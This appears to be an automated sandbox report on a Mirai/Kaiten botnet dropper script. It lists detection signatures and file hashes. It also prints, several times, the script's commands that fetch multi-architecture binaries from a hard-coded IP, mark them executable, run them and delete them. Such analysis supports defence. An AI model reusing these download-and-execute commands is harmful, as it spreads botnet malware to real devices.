[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-armhf-20250410-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/GoldAge3ATOarm N/A
File opened for modification /dev/misc/watchdog /tmp/GoldAge3ATOarm N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 84.162.70.65 N/A N/A

Enumerates active TCP sockets

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOarm N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself bhabssbbahhbahhhasa /tmp/GoldAge3ATOarm N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOarm N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network


Files

/tmp/GoldAge3ATOarm

MD5 c37a156e474db5c40f0affd035ee358f
SHA1 990bc43195246650ee6929c2c40afe7efa14d058
SHA256 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876
SHA512 ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6

/tmp/GoldAge3ATOarm5

MD5 d8e7f95f2de61c8a75cf9cf7777ba06d
SHA1 040e5656fed375ef1c7e253822f0edb3f350616b
SHA256 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db
SHA512 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8

/tmp/GoldAge3ATOarm6

MD5 3c5c66502403c26ffd38c305e0073e56
SHA1 584b0a7b269f9e07d3d1ca9880b8710f035e435a
SHA256 f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900
SHA512 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89

/tmp/GoldAge3ATOarm7

MD5 d1bc7e87209a400dfa40307eca08289a
SHA1 b9922e7972f0c46ecbcc18503b37b46299d3eaf9
SHA256 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b
SHA512 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50

/tmp/GoldAge3ATOm68k

/tmp/GoldAge3ATOmips

/tmp/GoldAge3ATOmpsl

/tmp/GoldAge3ATOppc

memory/793-1-0xb675b000-0xb676c044-memory.dmp

/tmp/GoldAge3ATOsh4

/tmp/GoldAge3ATOspc

/tmp/GoldAge3ATOx64

/tmp/GoldAge3ATOx86

/tmp/bash
